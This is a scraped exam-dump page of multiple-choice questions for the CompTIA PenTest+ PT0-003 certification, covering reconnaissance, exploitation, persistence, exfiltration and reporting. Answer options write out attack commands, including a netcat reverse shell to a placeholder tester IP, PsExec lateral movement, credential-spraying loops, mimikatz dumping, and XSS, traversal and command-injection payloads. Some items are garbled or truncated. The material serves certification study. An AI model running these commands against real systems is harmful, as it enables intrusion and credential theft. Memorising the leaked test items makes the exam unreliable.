Summer Sale Discount Flat 70% Offer - Ends in 0d 00h 00m 00s - Coupon code: 70diswrap

CompTIA PT0-003 Dumps

Page: 1 / 34
Total 336 questions

CompTIA PenTest+ Exam Questions and Answers

Question 1

While performing a penetration test, a tester executes the following command:

PS c:\tools > c:\hacks\PsExec.exe \\server01.cor.ptia.org -accepteula cmd.exe

Which of the following best explains what the tester is trying to do?

Options:

A.

Test connectivity using PsExec on the server01 using cmd.exe

B.

Perform a lateral movement attack using PsExec

C.

Send the PsExec binary file to the server01 using cmd.exe

D.

Enable cmd.exe on the server01 through PsExec

Question 2

Severity: HIGH

Vulnerability: ABC Load Balancer: Alpha OS httpd TLS vulnerability

An Nmap scan of the affected device produces the following results:

Host is up (0.0000040s latency).

Not shown: 98 closed tcp ports (reset)

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

443/tcp closed https

Which of the following best describes this scenario?

Options:

A.

True negative

B.

True positive

C.

False negative

D.

False positive

Question 3

During a security assessment of an e-commerce website, a penetration tester wants to exploit a vulnerability in the web server’s input validation that will allow unauthorized transactions on behalf of the user. Which of the following techniques would most likely be used for that purpose?

Options:

A.

Privilege escalation

B.

DOM injection

C.

Session hijacking

D.

Cross-site scripting

Question 4

A penetration tester finds it is possible to downgrade a web application ' s HTTPS connections to HTTP while performing on-path attacks on the local network. The tester reviews the output of the server response to:

curl -s -i

HTTP/2 302

date: Thu, 11 Jan 2024 15:56:24 GMT

content-type: text/html; charset=iso-8659-1

location: /login

x-content-type-options: nosniff

server: Prod

Which of the following recommendations should the penetration tester include in the report?

Options:

A.

Add the HSTS header to the server.

B.

Attach the httponly flag to cookies.

C.

Front the web application with a firewall rule to block access to port 80.

D.

Remove the x-content-type-options header.

Question 5

A penetration tester plans to conduct reconnaissance during an engagement using readily available resources. Which of the following resources would most likely identify hardware and software being utilized by the client?

Options:

A.

Cryptographic flaws

B.

Protocol scanning

C.

Cached pages

D.

Job boards

Question 6

A penetration tester is evaluating the security of a corporate client’s web application using federated access. Which of the following approaches has the least possibility of blocking the IP address of the tester’s machine?

Options:

A.

for user in $(cat users.txt); dofor pass in $(cat /usr/share/wordlists/rockyou.txt); docurl -sq -XPOST https://example.com/login.asp -d " username=$user & password=$pass " | grep " Welcome " & & echo " OK: $user $pass " done; done

B.

spray365.py generate --password_file passwords.txt --user_file users.txt --domain example.com --delay 1 --execution_plan target.planspray365.py spray target.plan

C.

import requests,pathlibusers=pathlib.Path( " users.txt " ).read_text(); passwords=pathlib.Path( " passwords.txt " ).read_text()for user in user:for pass in passwords:r=requests.post( " https://example.com " ,data=f " username={user} & password={pass} " ,headers={ " user-agent " : " Mozilla/5.0 " })if " Welcome " in r.text:print(f " OK: {user} {pass} " )

D.

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt < domain_ip > http-post-form " /login.asp:username=^USER^ & password=^PASS^:Invalid Password "

Question 7

Which of the following is the most likely LOLBin to be used to perform an exfiltration on a Microsoft Windows environment?

Options:

A.

procdump.exe

B.

msbuild.exe

C.

bitsadmin.exe

D.

cscript.exe

Question 8

During an assessment of a company, a penetration tester sends the following email to the company’s Chief Financial Officer (CFO):

Dear CFO,

As we talked about during a recent meeting, please open the following attachment that contains the invoice for an existing vendor. If you do not pay this now, we will suspend the licenses for your billing system in three days.

GoPay CMS Systems Services

Which of the following techniques is this attack an example of?

Options:

A.

Whaling

B.

Phishing

C.

Spear phishing

D.

Vishing

Question 9

A penetration tester completes a scan and sees the following output on a host:

bash

Copy code

Nmap scan report for victim (10.10.10.10)

Host is up (0.0001s latency)

PORT STATE SERVICE

161/udp open|filtered snmp

445/tcp open microsoft-ds

3389/tcp open microsoft-ds

Running Microsoft Windows 7

OS CPE: cpe:/o:microsoft:windows_7_sp0

The tester wants to obtain shell access. Which of the following related exploits should the tester try first?

Options:

A.

exploit/windows/smb/psexec

B.

exploit/windows/smb/ms08_067_netapi

C.

exploit/windows/smb/ms17_010_eternalblue

D.

auxiliary/scanner/snmp/snmp_login

Question 10

Which of the following scenarios would most likely lead a client to reprioritize goals after a penetration test begins?

Options:

A.

An end-of-life web server is decommissioned.

B.

A new zero-day vulnerability is publicly disclosed.

C.

The penetration tester is not capturing artifacts for an exploited vulnerability.

D.

A new lead penetration tester is assigned to the project.

Question 11

A penetration tester needs to quickly transfer an exploit from a Linux system to a Windows 10 system within the network. Which of the following is the best way to accomplish this task?

Options:

A.

nc -lvp 8080

B.

nc -lnvp 443

C.

python3 -m http.server 80

D.

ncat -lvp 9090

Question 12

Which of the following authorizations is mandatory when a penetration tester is involved in a complex IT infrastructure?

Options:

A.

Customer authorization

B.

Penetration tester authorization

C.

Third-party authorization

D.

Internal team authorization

Question 13

A penetration tester presents the following findings to stakeholders:

Control | Number of findings | Risk | Notes

Encryption | 1 | Low | Weak algorithm noted

Patching | 8 | Medium | Unsupported systems

System hardening | 2 | Low | Baseline drift observed

Secure SDLC | 10 | High | Libraries have vulnerabilities

Password policy | 0 | Low | No exceptions noted

Based on the findings, which of the following recommendations should the tester make? (Select two).

Options:

A.

Develop a secure encryption algorithm.

B.

Deploy an asset management system.

C.

Write an SDLC policy.

D.

Implement an SCA tool.

E.

Obtain the latest library version.

F.

Patch the libraries.

Question 14

During a penetration test, the tester identifies several unused services that are listening on all targeted internal laptops. Which of the following technical controls should the tester recommend to reduce the risk of compromise?

as

Options:

A.

Multifactor authentication

B.

Patch management

C.

System hardening

D.

Network segmentation

Question 15

During an assessment, a penetration tester sends the following request:

POST /services/v1/users/create HTTP/1.1

Host: target-application.com

Content-Type: application/json

Content-Length: [dynamic]

Authorization: Bearer (FUZZ)

Which of the following attacks is the penetration tester performing?

Options:

A.

Directory traversal

B.

API abuse

C.

Server-side request forgery

D.

Privilege escalation

Question 16

A tester obtains access to an endpoint subnet and wants to move laterally in the network. Given the following output:

kotlin

Copy code

Nmap scan report for some_host

Host is up (0.01 latency).

PORT STATE SERVICE

445/tcp open microsoft-ds

Host script results: smb2-security-mode: Message signing disabled

Which of the following command and attack methods is the most appropriate for reducing the chances of being detected?

Options:

A.

responder -T eth0 -dwv ntlmrelayx.py -smb2support -tf < target >

B.

msf > use exploit/windows/smb/ms17_010_psexec msf > < set options > msf > run

C.

hydra -L administrator -P /path/to/passwdlist smb:// < target >

D.

nmap —script smb-brute.nse -p 445 < target >

Question 17

Which of the following would most likely reduce the possibility of a client rejecting the final deliverable for a penetration test?

Options:

A.

Goal reprioritization

B.

Stakeholder alignment

C.

Non-disclosure agreement

D.

Business impact analysis

Question 18

A penetration tester enters an invalid user ID on the login page of a web application. The tester receives a message indicating the user is not found. Then, the tester tries a valid user ID but an incorrect password, but the web application indicates the password is invalid. Which of the following should the tester attempt next?

Options:

A.

Error log analysis

B.

DoS attack

C.

Enumeration

D.

Password dictionary attack

Question 19

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

as

Options:

Question 20

Which of the following can an access control vestibule help deter?

Options:

A.

USB drops

B.

Badge cloning

C.

Lock picking

D.

Tailgating

Question 21

During a penetration test, the tester gains full access to the application ' s source code. The application repository includes thousands of code files. Given that the assessment timeline is very short, which of the following approaches would allow the tester to identify hard-coded credentials most effectively?

Options:

A.

Run TruffleHog against a local clone of the application

B.

Scan the live web application using Nikto

C.

Perform a manual code review of the Git repository

D.

Use SCA software to scan the application source code

Question 22

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

Options:

A.

Burp Suite

B.

masscan

C.

Nmap

D.

hping

Question 23

A penetration tester has been asked to conduct a blind web application test against a customer ' s corporate website. Which of the following tools would be best suited to perform this assessment?

Options:

A.

ZAP

B.

Nmap

C.

Wfuzz

D.

Trufflehog

Question 24

As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?

Options:

A.

Establishing a reverse shell

B.

Executing a process injection attack

C.

Creating a scheduled task

D.

Performing a credential-dumping attack

Question 25

A tester is working on an engagement that has evasion and stealth requirements. Which of the following enumeration methods is the least likely to be detected by the IDS?

Options:

A.

curl https://api.shodan.io/shodan/host/search?key= < API_KEY > & query=hostname: < target >

B.

proxychains nmap -sV -T2 < target >

C.

for i in < target > ; do curl -k $i; done

D.

nmap -sV -T2 < target >

Question 26

A penetration tester wants to gather the names of potential phishing targets who have access to sensitive data. Which of the following would best meet this goal?

Options:

A.

WHOIS

B.

Censys.io

C.

SpiderFoot

D.

theHarvester

Question 27

A penetration tester is conducting an assessment of offline systems that control a power plant. The tester is looking for vulnerabilities observable in the network stack. The rules of engagement state that the tester cannot interact with production systems. Which of the following tools or techniques should the tester use for the assessment?

Options:

A.

Port mirroring

B.

Storyboarding

C.

Write blocker

D.

SAST tool

Question 28

A penetration tester is evaluating a company ' s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? (Select two).

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Question 29

A penetration tester currently conducts phishing reconnaissance using various tools and accounts for multiple intelligence-gathering platforms. The tester wants to consolidate some of the tools and accounts into one solution to analyze the output from the intelligence-gathering tools. Which of the following is the best tool for the penetration tester to use?

Options:

A.

Caldera

B.

SpiderFoot

C.

Maltego

D.

WIGLE.net

Question 30

Which of the following is the most efficient way to infiltrate a file containing data that could be sensitive?

Options:

A.

Use steganography and send the file over FTP

B.

Compress the file and send it using TFTP

C.

Split the file in tiny pieces and send it over dnscat

D.

Encrypt and send the file over HTTPS

Question 31

During a security audit, a penetration tester wants to run a process to gather information about a target network ' s domain structure and associated IP addresses. Which of the following tools should the tester use?

Options:

A.

Dnsenum

B.

Nmap

C.

Netcat

D.

Wireshark

Question 32

A penetration tester needs to launch an Nmap scan to find the state of the port for both TCP and UDP services. Which of the following commands should the tester use?

Options:

A.

nmap -sU -sW -p 1-65535 example.com

B.

nmap -sU -sY -p 1-65535 example.com

C.

nmap -sU -sT -p 1-65535 example.com

D.

nmap -sU -sN -p 1-65535 example.com

Question 33

A tester is performing an external phishing assessment on the top executives at a company. Two-factor authentication is enabled on the executives’ accounts that are in the scope of work. Which of the following should the tester do to get access to these accounts?

Options:

A.

Configure an external domain using a typosquatting technique. Configure Evilginx to bypass two-factor authentication using a phishlet that simulates the mail portal for the company.

B.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a brute-force attack method.

C.

Configure an external domain using a typosquatting technique. Configure SET to bypass two-factor authentication using a phishlet that mimics the mail portal for the company.

D.

Configure Gophish to use an external domain. Clone the email portal web page from the company and get the two-factor authentication code using a vishing method.

Question 34

A penetration tester is trying to execute a post-exploitation activity and creates the follow script:

as

Which of the following best describes the tester ' s objective?

Options:

A.

To download data from an API endpoint

B.

To download data from a cloud storage

C.

To exfiltrate data over alternate data streams

D.

To exfiltrate data to cloud storage

Question 35

A penetration tester has discovered sensitive files on a system. Assuming exfiltration of the files is part of the scope of the test, which of the following is most likely to evade DLP systems?

Options:

A.

Encoding the data and pushing through DNS to the tester ' s controlled server.

B.

Padding the data and uploading the files through an external cloud storage service.

C.

Obfuscating the data and pushing through FTP to the tester ' s controlled server.

D.

Hashing the data and emailing the files to the tester ' s company inbox.

Question 36

During an assessment, a penetration tester plans to gather metadata from various online files, including pictures. Which of the following standards outlines the formats for pictures, audio, and additional tags that facilitate this type of reconnaissance?

Options:

A.

EXIF

B.

GIF

C.

COFF

D.

ELF

Question 37

A penetration tester conducts reconnaissance for a client ' s network and identifies the following system of interest:

$ nmap -A AppServer1.compita.org

Starting Nmap 7.80 (2023-01-14) on localhost (127.0.0.1) at 2023-08-04 15:32:27

Nmap scan report for AppServer1.compita.org (192.168.1.100)

Host is up (0.001s latency).

Not shown: 999 closed ports

Port State Service

21/tcp open ftp

22/tcp open ssh

23/tcp open telnet

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

443/tcp open https

445/tcp open microsoft-ds

873/tcp open rsync

8080/tcp open http-proxy

8443/tcp open https-alt

9090/tcp open zeus-admin

10000/tcp open snet-sensor-mgmt

The tester notices numerous open ports on the system of interest. Which of the following best describes this system?

Options:

A.

A honeypot

B.

A Windows endpoint

C.

A Linux server

D.

An already-compromised system

Question 38

During a red-team exercise, a penetration tester obtains an employee ' s access badge. The tester uses the badge’s information to create a duplicate for unauthorized entry.

Which of the following best describes this action?

Options:

A.

Smurfing

B.

Credential stuffing

C.

RFID cloning

D.

Card skimming

Question 39

During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:

schtasks /create /sc onlogon /tn " Windows Update " /tr " cmd.exe /c reverse_shell.exe "

Which of the following is the penetration tester trying to do with this code?

Options:

A.

Enumerate the scheduled tasks

B.

Establish persistence

C.

Deactivate the Windows Update functionality

D.

Create a binary application for Windows System Updates

Question 40

A penetration tester is performing reconnaissance for a web application assessment. Upon investigation, the tester reviews the robots.txt file for items of interest.

INSTRUCTIONS

Select the tool the penetration tester should use for further investigation.

Select the two entries in the robots.txt file that the penetration tester should recommend for removal.

as

Options:

Question 41

A penetration tester needs to exploit a vulnerability in a wireless network that has weak encryption to perform traffic analysis and decrypt sensitive information. Which of the following techniques would best allow the penetration tester to have access to the sensitive information?

Options:

A.

Bluejacking

B.

SSID spoofing

C.

Packet sniffing

D.

ARP poisoning

Question 42

A penetration tester needs to confirm the version number of a client ' s web application server. Which of the following techniques should the penetration tester use?

Options:

A.

SSL certificate inspection

B.

URL spidering

C.

Banner grabbing

D.

Directory brute forcing

Question 43

During an assessment, a penetration tester exploits an SQLi vulnerability. Which of the following commands would allow the penetration tester to enumerate password hashes?

Options:

A.

sqlmap -u www.example.com/?id=1 --search -T user

B.

sqlmap -u www.example.com/?id=1 --dump -D accounts -T users -C cred

C.

sqlmap -u www.example.com/?id=1 --tables -D accounts

D.

sqlmap -u www.example.com/?id=1 --schema --current-user --current-db

Question 44

You are a penetration tester reviewing a client’s website through a web browser.

INSTRUCTIONS

Review all components of the website through the browser to determine if vulnerabilities are present.

Remediate ONLY the highest vulnerability from either the certificate, source, or cookies.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

as

as

as

as

as

as

as

Options:

Question 45

A tester conducts a web application penetration test and discovers a hidden diagnostics page. The hidden diagnostics page allows a user to ping other systems and test connectivity. Which of the following payloads is best suited to test this function?

Options:

A.

; whoami ; ps aux

B.

< script > alert(1) < /script >

C.

' SELECT @@version --

D.

../../../../../../etc/passwd

Question 46

A penetration tester finishes an initial discovery scan for hosts on a /24 customer subnet. The customer states that the production network is composed of Windows servers but no container clusters. The following are the last several lines from the scan log:

Line 1: 112 hosts found... trying ports

Line 2: FOUND 22 with OpenSSH 1.2p2 open on 99 hosts

Line 3: FOUND 161 with UNKNOWN banner open on 110 hosts

Line 4: TCP RST received on ports 21, 3389, 80

Line 5: Scan complete.

Which of the following is the most likely reason for the results?

Options:

A.

Multiple honeypots were encountered

B.

The wrong subnet was scanned

C.

Windows is using WSL

D.

IPS is blocking the ports

Question 47

During a penetration test, a junior tester uses Hunter.io for an assessment and plans to review the information that will be collected. Which of the following describes the information the junior tester will receive from the Hunter.io tool?

Options:

A.

A collection of email addresses for the target domain that is available on multiple sources on the internet

B.

DNS records for the target domain and subdomains that could be used to increase the external attack surface

C.

Data breach information about the organization that could be used for additional enumeration

D.

Information from the target ' s main web page that collects usernames, metadata, and possible data exposures

Question 48

A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?

Options:

A.

VM

B.

IAST

C.

DAST

D.

SCA

Question 49

A penetration tester is trying to get unauthorized access to a web application and executes the following command:

GET /foo/images/file?id=2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd

Which of the following web application attacks is the tester performing?

Options:

A.

Insecure Direct Object Reference

B.

Cross-Site Request Forgery

C.

Directory Traversal

D.

Local File Inclusion

Question 50

A penetration tester is evaluating a company’s cybersecurity preparedness. The tester wants to acquire valid credentials using a social engineering campaign. Which of the following tools and techniques are most applicable in this scenario? Select two.

Options:

A.

TruffleHog for collecting credentials

B.

Shodan for identifying potential targets

C.

Gophish for sending phishing emails

D.

Maltego for organizing targets

E.

theHarvester for discovering additional targets

F.

Evilginx for handling legitimate authentication requests through a proxy

Question 51

A penetration tester is researching a path to escalate privileges. While enumerating current user privileges, the tester observes the following output:

mathematica

Copy code

SeAssignPrimaryTokenPrivilege Disabled

SeIncreaseQuotaPrivilege Disabled

SeChangeNotifyPrivilege Enabled

SeManageVolumePrivilege Enabled

SeImpersonatePrivilege Enabled

SeCreateGlobalPrivilege Enabled

SeIncreaseWorkingSetPrivilege Disabled

Which of the following privileges should the tester use to achieve the goal?

Options:

A.

SeImpersonatePrivilege

B.

SeCreateGlobalPrivilege

C.

SeChangeNotifyPrivilege

D.

SeManageVolumePrivilege

Question 52

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting

B.

Attack path mapping

C.

Service discovery

D.

User enumeration

Question 53

A penetration tester gains access to the target network and observes a running SSH server.

Which of the following techniques should the tester use to obtain the version of SSH running on the target server?

Options:

A.

Network sniffing

B.

IP scanning

C.

Banner grabbing

D.

DNS enumeration

Question 54

Which of the following components should a penetration tester include in an assessment report?

Options:

A.

User activities

B.

Customer remediation plan

C.

Key management

D.

Attack narrative

Question 55

During an engagement, a penetration tester discovers a web application vulnerability that affects multiple devices. The tester creates and runs the following script:

#!/bin/sh

for addr in $(cat targets)

do

curl

done

Which of the following best describes what the tester is attempting to do?

Options:

A.

Staging payloads to make bind shells

B.

Creating a backdoor on several weak targets

C.

Adding a password for the root user on the targets

D.

Generating SSH keys to decrypt data on each target

Question 56

A penetration tester is performing a network security assessment. The tester wants to intercept communication between two users and then view and potentially modify transmitted data. Which of the following types of on-path attacks would be best to allow the penetration tester to achieve this result?

Options:

A.

DNS spoofing

B.

ARP poisoning

C.

VLAN hopping

D.

SYN flooding

Question 57

A penetration tester wants to check the security awareness of specific workers in the company with targeted attacks. Which of the following attacks should the penetration tester perform?

Options:

A.

Phishing

B.

Tailgating

C.

Whaling

D.

Spear phishing

Question 58

Which of the following are valid reasons for including base, temporal, and environmental CVSS metrics in the findings section of a penetration testing report? (Select two).

Options:

A.

Providing details on how to remediate vulnerabilities

B.

Helping to prioritize remediation based on threat context

C.

Including links to the proof-of-concept exploit itself

D.

Providing information on attack complexity and vector

E.

Prioritizing compliance information needed for an audit

F.

Adding risk levels to each asset

Question 59

A company hires a penetration tester to test the security implementation of its wireless networks. The main goal for this assessment is to intercept and get access to sensitive data from the company ' s employees. Which of the following tools should the security professional use to best accomplish this task?

Options:

A.

Metasploit

B.

WiFi-Pumpkin

C.

SET

D.

theHarvester

E.

WiGLE.net

Question 60

A penetration tester conducts a scan on an exposed Linux web server and gathers the following data:

Host: 192.168.55.23

Open Ports:

22/tcp Open OpenSSH 7.2p2 Ubuntu 4ubuntu2.10

80/tcp Open Apache httpd 2.4.18 (Ubuntu)

111/tcp Open rpcbind 2-4 (RPC #100000)

Additional notes:

Directory listing enabled on /admin

Apache mod_cgi enabled

No authentication required to access /cgi-bin/debug.sh

X-Powered-By: PHP/5.6.40-0+deb8u12

Which of the following is the most effective action to take?

Options:

A.

Launch a payload using msfvenom and upload it to the /admin directory.

B.

Review the contents of /cgi-bin/debug.sh.

C.

Use Nikto to scan the host and port 80.

D.

Attempt a brute-force attack against OpenSSH 7.2p2.

Question 61

As part of a security audit, a penetration tester finds an internal application that accepts unexpected user inputs, leading to the execution of arbitrary commands. Which of the following techniques would the penetration tester most likely use to access the sensitive data?

Options:

A.

Logic bomb

B.

SQL injection

C.

Brute-force attack

D.

Cross-site scripting

Question 62

A penetration tester obtains the following output during an Nmap scan:

PORT STATE SERVICE

135/tcp open msrpc

445/tcp open microsoft-ds

1801/tcp open msmq

2103/tcp open msrpc

3389/tcp open ms-wbt-server

Which of the following should be the next step for the tester?

Options:

A.

Search for vulnerabilities on msrpc.

B.

Enumerate shares and search for vulnerabilities on the SMB service.

C.

Execute a brute-force attack against the Remote Desktop Services.

D.

Execute a new Nmap command to search for another port.

Question 63

A penetration tester downloads a JAR file that is used in an organization ' s production environment. The tester evaluates the contents of the JAR file to identify potentially vulnerable components that can be targeted for exploit. Which of the following describes the tester ' s activities?

Options:

A.

SAST

B.

SBOM

C.

ICS

D.

SCA

Question 64

During an assessment, a penetration tester obtains a low-privilege shell and then runs the following command:

findstr /SIM /C: " pass " *.txt *.cfg *.xml

Which of the following is the penetration tester trying to enumerate?

Options:

A.

Configuration files

B.

Permissions

C.

Virtual hosts

D.

Secrets

Question 65

A penetration tester performs the following scan:

nmap -sU -p 53,161,162 192.168.1.51

PORT | STATE

53/udp | open|filtered

161/udp | open|filtered

162/udp | open|filtered

The tester then manually uses snmpwalk against port 161 and receives valid SNMP responses. Which of the following best explains the scan result for port 161?

Options:

A.

The SNMP daemon delayed its response beyond Nmap’s UDP scan timeout.

B.

Nmap marked the port as open|filtered because no response was received.

C.

The scanned host applied rate limiting to its responses to prevent UDP fingerprinting.

D.

The Nmap scan lacked root privileges, which reduced packet inspection accuracy.

Question 66

During a penetration test, a tester compromises a Windows computer. The tester executes the following command and receives the following output:

mimikatz # privilege::debug

mimikatz # lsadump::cache

---Output---

lapsUser

27dh9128361tsg2€459210138754ij

---OutputEnd---

Which of the following best describes what the tester plans to do by executing the command?

Options:

A.

The tester plans to perform the first step to execute a Golden Ticket attack to compromise the Active Directory domain.

B.

The tester plans to collect application passwords or hashes to compromise confidential information within the local computer.

C.

The tester plans to use the hash collected to perform lateral movement to other computers using a local administrator hash.

D.

The tester plans to collect the ticket information from the user to perform a Kerberoasting attack on the domain controller.

Question 67

A penetration tester gains access to a domain server and wants to enumerate the systems within the domain. Which of the following tools would provide the best oversight of domains?

Options:

A.

Netcat

B.

Wireshark

C.

Nmap

D.

Responder

Question 68

Which of the following techniques is the best way to avoid detection by data loss prevention tools?

Options:

A.

Encoding

B.

Compression

C.

Encryption

D.

Obfuscation

Question 69

During a discussion of a penetration test final report, the consultant shows the following payload used to attack a system:

html

Copy code

7/ < sCRitP > aLeRt( ' pwned ' ) < /ScriPt >

Based on the code, which of the following options represents the attack executed by the tester and the associated countermeasure?

Options:

A.

Arbitrary code execution: the affected computer should be placed on a perimeter network

B.

SQL injection attack: should be detected and prevented by a web application firewall

C.

Cross-site request forgery: should be detected and prevented by a firewall

D.

XSS obfuscated: should be prevented by input sanitization

Question 70

During an engagement, a penetration tester decides to use social engineering to capture MFA. Which of the following tools or configuration commands should the tester use?

Options:

A.

Evilginx

B.

use phish/domains/o365set SOURCE portal.office.comrun

C.

wget portal.office.comexport MFA= ' < myphishdomain > '

D.

Recon-ng

Question 71

A tester needs to begin capturing WLAN credentials for cracking during an on-site engagement. Which of the following is the best command to capture handshakes?

Options:

A.

tcpdump -n -s0 -w < pcapname > -i < iface >

B.

airserv-ng -d < iface >

C.

aireplay-ng -0 1000 -a < target_mac >

D.

airodump-ng -c 6 --bssid < target_mac > < iface >

Question 72

A penetration tester needs to use the native binaries on a system in order to download a file from the internet and evade detection. Which of the following tools would the tester most likely use?

Options:

A.

netsh.exe

B.

certutil.exe

C.

nc.exe

D.

cmdkey.exe

Question 73

After a recent penetration test was conducted by the company ' s penetration testing team, a systems administrator notices the following in the logs:

2/10/2023 05:50AM C:\users\mgranite\schtasks /query

2/10/2023 05:53AM C:\users\mgranite\schtasks /CREATE /SC DAILY

Which of the following best explains the team ' s objective?

Options:

A.

To enumerate current users

B.

To determine the users ' permissions

C.

To view scheduled processes

D.

To create persistence in the network

Question 74

Testing and reporting activities are complete. A penetration tester needs to verify that exploited systems have been restored to preengagement conditions. Which of the following would be most appropriate for the tester to do?

Options:

A.

Terminate the running command-and-control payload.

B.

Provide the customer with a list of the changes made.

C.

Replace environment variables with their original values.

D.

Put in a change request ticket to reimage the system.

Question 75

A penetration tester conducts a web application assessment and receives the following Set-Cookie upon logging in:

Set-Cookie auth=UGVudGVzdFVzZXI6OTE1MzYK

Upon analysis, the penetration tester determines this is a Base64-encoded string, which when decoded reads:

Pentestuser:91536

The penetration tester logs out, logs back in, and sees the decoded string now reads:

Pentestuser:91944

Which of the following attacks will the penetration tester most likely conduct based on this information?

Options:

A.

Collision attack

B.

JWT manipulation

C.

Session hijacking

D.

Insecure direct object reference

Question 76

A client specifies that live packet capture must be conducted between 2:00 a.m. and 6:00 a.m. to prevent potential disruptions to operations. Which of the following tools should the penetration tester use to analyze this information at a later time?

Options:

A.

Maltego

B.

Wayback Machine

C.

Wireshark

D.

Shodan

Question 77

During a security assessment, a penetration tester uses a tool to capture plaintext log-in credentials on the communication between a user and an authentication system. The tester wants to use this information for further unauthorized access. Which of the following tools is the tester using?

Options:

A.

Burp Suite

B.

Wireshark

C.

Zed Attack Proxy

D.

Metasploit

Question 78

A penetration tester wants to bypass multi-factor authentication by intercepting traffic between the client and a web server. Which of the following is the most appropriate tool for this task?

Options:

A.

Gophish

B.

Recon-ng

C.

BeEF

D.

Evilginx

E.

Yersinia

Question 79

A penetration tester attempts to obtain the preshared key for a client ' s wireless network. Which of the following actions will most likely aid the tester?

Options:

A.

Deploying an evil twin with a WiFi Pineapple

B.

Performing a password spraying attack with Hydra

C.

Setting up a captive portal using SET

D.

Deauthenticating clients using aireplay-ng

Question 80

A penetration tester is performing an authorized physical assessment. During the test, the tester observes an access control vestibule and on-site security guards near the entry door in the lobby. Which of the following is the best attack plan for the tester to use in order to gain access to the facility?

Options:

A.

Clone badge information in public areas of the facility to gain access to restricted areas.

B.

Tailgate into the facility during a very busy time to gain initial access.

C.

Pick the lock on the rear entrance to gain access to the facility and try to gain access.

D.

Drop USB devices with malware outside of the facility in order to gain access to internal machines.

Question 81

A penetration tester is searching for vulnerabilities or misconfigurations on a container environment. Which of the following tools will the tester most likely use to achieve this objective?

Options:

A.

Nikto

B.

Trivy

C.

Nessus

D.

Nmap

Question 82

Which of the following activities should be performed to prevent uploaded web shells from being exploited by others?

Options:

A.

Removing persistence mechanisms

B.

Uninstalling tools

C.

Preserving artifacts

D.

Reverting configuration changes

Question 83

A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is Which of the following should the tester use to perform the task with the fewest web requests?

Options:

A.

nc -e /bin/sh -lp 53

B.

/bin/sh -c ' nc -l -p 443 '

C.

nc -e /bin/sh < pentester_ip > 53

D.

/bin/sh -c ' nc < pentester_ip > 443 '

Question 84

A penetration tester successfully gains access to a Linux system and then uses the following command:

find / -type f -ls > /tmp/recon.txt

Which of the following best describes the tester ' s goal?

Options:

A.

Permission enumeration

B.

Secrets enumeration

C.

User enumeration

D.

Service enumeration

Question 85

A penetration tester finishes a security scan and uncovers numerous vulnerabilities on several hosts. Based on the targets ' EPSS (Exploit Prediction Scoring System) and CVSS (Common Vulnerability Scoring System) scores, which of the following targets is the most likely to get attacked?

Options:

A.

Target 1: EPSS Score = 0.6, CVSS Score = 4

B.

Target 2: EPSS Score = 0.3, CVSS Score = 2

C.

Target 3: EPSS Score = 0.6, CVSS Score = 1

D.

Target 4: EPSS Score = 0.4, CVSS Score = 4.5

Question 86

An internal penetration tester is on site assessing network access for company-owned mobile devices. Which of the following would be the best tool to identify the available networks?

Options:

A.

Wireshark

B.

theHarvester

C.

Recon-ng

D.

WiGLE.net

Question 87

Which of the following describes the process of determining why a vulnerability scanner is not providing results?

Options:

A.

Root cause analysis

B.

Secure distribution

C.

Peer review

D.

Goal reprioritization

Question 88

During an assessment, a penetration tester obtains access to a Microsoft SQL server using sqlmap and runs the following command:

sql > xp_cmdshell whoami /all

Which of the following is the tester trying to do?

Options:

A.

List database tables

B.

Show logged-in database users

C.

Enumerate privileges

D.

Display available SQL commands

Question 89

Which of the following elements of a penetration test report can be used to most effectively prioritize the remediation efforts for all the findings?

Options:

A.

Methodology

B.

Detailed findings list

C.

Risk score

D.

Executive summary

Question 90

A penetration tester is getting ready to conduct a vulnerability scan to evaluate an environment that consists of a container orchestration cluster. Which of the following tools would be best to use for this purpose?

Options:

A.

NSE

B.

Nessus

C.

CME

D.

Trivy

Question 91

As part of a penetration test, a tester needs to discover systems in the OT-segmented network. The tester should not disrupt OT services and must minimize device interaction. Which of the following should the penetration tester do?

Options:

A.

Collect data from the OT devices by physically assessing the OT environment.

B.

Perform a passive network capture process for a fixed period of time.

C.

Configure a vulnerability scan engine with low-impact flags and options.

D.

Deploy agents on the OT workstations to scan the other devices.

Question 92

A penetration tester is attempting to exfiltrate sensitive data from a client environment without alerting the client ' s blue team. Which of the following exfiltration methods most likely remain undetected?

Options:

A.

Cloud storage

B.

Email

C.

Domain Name System

D.

Test storage sites

Question 93

A tester runs an Nmap scan against a Windows server and receives the following results:

Nmap scan report for win_dns.local (10.0.0.5)

Host is up (0.014s latency)

Port State Service

53/tcp open domain

161/tcp open snmp

445/tcp open smb-ds

3389/tcp open rdp

Which of the following TCP ports should be prioritized for using hash-based relays?

Options:

A.

53

B.

161

C.

445

D.

3389

Question 94

A penetration tester runs a vulnerability scan that identifies several issues across numerous customer hosts. The executive report outlines the following information:

Server High-severity vulnerabilities

1. Development sandbox server 32

2. Back office file transfer server 51

3. Perimeter network web server 14

4. Developer QA server 92

